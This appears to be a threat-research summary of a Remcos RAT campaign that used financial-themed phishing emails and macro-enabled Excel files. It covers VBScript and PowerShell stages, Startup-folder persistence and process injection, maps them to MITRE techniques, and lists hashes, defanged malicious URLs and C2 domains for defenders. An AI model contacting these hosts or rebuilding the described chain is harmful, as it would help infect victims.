Threat Research

Remcos Trojan: Analyzing the Attack Chain

Securonix

Morphisec Labs detects a new Remcos Trojan infection chain delivered through financial-themed phishing emails that lure users to open a malicious Excel file. The multi-stage attack uses VBScript and PowerShell to fetch further payloads from a C2, employs persistence via the Startup folder, and culminates in a RC4-encrypted Remcos configuration and final Remcos RAT payload. #Remcos #BreakingSecurity #WellsFargo #FISGlobal #ACHPayment

Keypoints

  • Remcos is a commercial remote access trojan (RAT) developed by BreakingSecurity, with a free version available.
  • The phishing lure centers on financial topics (Wells Fargo, FIS Global, ACH Payment) to entice opening a malicious Excel attachment.
  • The infection chain begins with a malicious .xls that contains Visual Basic code executed when macros are enabled.
  • Multiple scripting stages are used (VBScript, PowerShell) to download and decode subsequent stages from a C2 server.
  • Persistence is achieved by copying scripts to the Startup folder, while the C2 delivers additional stages and final payloads.
  • Final payload is Remcos RAT; its configuration is stored RC4-encrypted in a resource and decrypted after extraction.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Lures user to open a malicious Excel file; “The attacker lures a user to open a malicious Excel file that contains ‘confidential information’ which starts the infection chain.”
  • [T1204.002] User Execution: Malicious File – “The .xls file contains a Visual Basic code that executes once a user opens the file and enables macros.”
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – “The .vbs reads the PowerShell command that is written to F variable, a FileSystemObject CLSID to F2, and a second CLSID to F3.”
  • [T1059.001] PowerShell – “PowerShell command downloads the file from 209.127.19[.]101/win.vbs in this case.”
  • [T1105] Ingress Tool Transfer – “Inside QAITB.vbs is a reversed PowerShell command which downloads the next stage and saves it to disk.”
  • [T1547.001] Boot or Logon Autostart: Startup Folder – “Set persistence by copying the script to the Startup folder.”
  • [T1027] Obfuscated/Compressed Files and Information – “RC4 decrypt the encrypted section using the key.”
  • [T1055] Process Injection – “The injector is loaded into memory and the malware calls a function that injects the payload into RegAsm.exe.”
  • [T1071.001] Web Protocols – “This infection chain largely depends on the C2 server, which stores the required files for each stage.”

Indicators of Compromise

  • [Hash] Email-related IOCs – c221b6eb8437d1f43ebffae9e51c7d330016290d048cfff2f402a7508b1e16e3, 8740cdcef9e825fd5105b021e0616a1d6a41f761c92f29127cd000c8500f70e6, and 5 more hashes (malicious email attachments used in the campaign)
  • [Hash] XLSs – 6ad5d2aae0cb58f943f39d8b43492fd6007cd8caeeaaea03013194572756b124, 85c4808b3ed64480ae0d9f5c6fdaade6c7298f89cb4b799f0d5510b674d0a367, and 3 more hashes
  • [Hash] XLSs .vbs – e0306366dd9c04bc92421d855a116d145e4b9afe4852bc77a02089d363d031a4, 1e7dba5f19588eeceffb45e96f4673ce181d64392805c5a78e83ae8c15d42d61, and 9 more hashes
  • [URL] URLs – hxxp://kingspalmhomes[.]com/wprl/Protected Client.vbs, hxxp://kingspalmhomes[.]com/admin/Protected Client.vbs, hxxp://209.127.19[.]101/win.vbs, and additional related paths
  • [Domain] Domains – fisintegrateds[.]com, kingspalmhomes[.]com, gotovacoil[.]com, dreamwatchevent[.]com, 209.127.19[.]101
  • [Hash] Final Payload (Remcos) – 79AD11D52EA3D0BD956CAD871396C8DA2C9A76FFFC02E694339B7FE8B6CE18EA, CFD29C1AC568E0A21B5F2C05B96BB5BBF2848E89BD6DBDDF4C69DAB3B1CD8A32, and 3 more hashes
  • [Domain] Remcos C2s – shiestynerd[.]dvrlists[.]com, breakingsecurity[.]dvrlists[.]com, freshdirect[.]dvrlists[.]com

Read more: https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain